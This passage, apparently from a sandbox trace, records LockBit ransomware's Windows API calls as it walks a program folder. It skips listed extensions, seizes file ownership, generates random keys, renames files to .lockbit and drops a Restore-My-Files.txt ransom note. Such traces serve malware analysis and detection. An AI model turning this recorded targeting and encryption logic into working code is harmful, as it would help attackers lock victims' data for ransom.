pSecurityDescriptor=0x3d6aa94) returned 1 [0081.824] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.824] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.825] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.825] CloseHandle (hObject=0x3c4) returned 1 [0081.825] free (_Block=0x77d800) [0081.825] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.825] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.825] malloc (_Size=0x40068) returned 0x1ff1e60 [0081.825] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=35858) returned 1 [0081.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0081.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.826] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0081.827] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0081.837] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.837] malloc (_Size=0xbe) returned 0x77d800 [0081.837] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0081.837] free (_Block=0x77d800) [0081.837] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.837] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.837] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.837] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71254251, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71254251, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2f993, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0081.837] lstrcmpiW (lpString1=".", lpString2="background.png") returned -1 [0081.837] lstrcmpiW (lpString1="..", lpString2="background.png") returned -1 [0081.837] PathFindExtensionW (pszPath="background.png") returned=".png" [0081.837] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.837] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.837] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.837] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.838] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.838] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.838] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.838] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.838] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.839] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.839] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="background.png") returned 1 [0081.839] lstrcmpiW (lpString1="ntldr", lpString2="background.png") returned 1 [0081.839] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="background.png") returned 1 [0081.839] lstrcmpiW (lpString1="bootsect.bak", lpString2="background.png") returned 1 [0081.840] lstrcmpiW (lpString1="autorun.inf", lpString2="background.png") returned -1 [0081.840] lstrcmpiW (lpString1="thumbs.db", lpString2="background.png") returned 1 [0081.840] lstrcmpiW (lpString1="iconcache.db", lpString2="background.png") returned 1 [0081.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png") returned=".png" [0081.840] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.840] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.840] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.840] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.841] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.841] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.841] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.841] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png.lockbit") returned 76 [0081.841] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.890] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.890] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.890] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.890] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.891] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.891] RtlFreeAnsiString (AnsiString="\\") [0081.891] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.891] malloc (_Size=0x200) returned 0x77d800 [0081.891] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.891] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.891] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.891] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.892] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.892] CloseHandle (hObject=0x3b4) returned 1 [0081.892] free (_Block=0x77d800) [0081.892] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.892] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.892] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.892] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=194963) returned 1 [0081.892] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.893] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.893] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.893] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.894] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.895] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.895] malloc (_Size=0xae) returned 0x77d800 [0081.895] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0081.896] free (_Block=0x77d800) [0081.896] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.896] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.896] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.896] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0081.896] lstrcmpiW (lpString1=".", lpString2="btn-back-static.png") returned -1 [0081.896] lstrcmpiW (lpString1="..", lpString2="btn-back-static.png") returned -1 [0081.896] PathFindExtensionW (pszPath="btn-back-static.png") returned=".png" [0081.896] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.896] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.896] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.896] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.896] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.896] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.897] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.897] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.897] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.897] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.897] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.897] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.898] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.898] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-back-static.png") returned 1 [0081.898] lstrcmpiW (lpString1="ntldr", lpString2="btn-back-static.png") returned 1 [0081.898] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-back-static.png") returned 1 [0081.898] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-back-static.png") returned -1 [0081.898] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-back-static.png") returned -1 [0081.898] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-back-static.png") returned 1 [0081.898] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-back-static.png") returned 1 [0081.899] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.899] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png") returned=".png" [0081.899] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.899] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.899] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.899] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.899] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.900] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.900] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png.lockbit") returned 81 [0081.900] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.900] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.901] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.901] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.901] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.901] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.901] RtlFreeAnsiString (AnsiString="\\") [0081.901] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.901] malloc (_Size=0x200) returned 0x77d800 [0081.901] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.901] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.902] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.902] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.902] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.902] CloseHandle (hObject=0x3c4) returned 1 [0081.902] free (_Block=0x77d800) [0081.902] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.903] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.903] malloc (_Size=0x40068) returned 0x1ff1e60 [0081.903] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10888) returned 1 [0081.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0081.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0081.904] ReadFile (in: 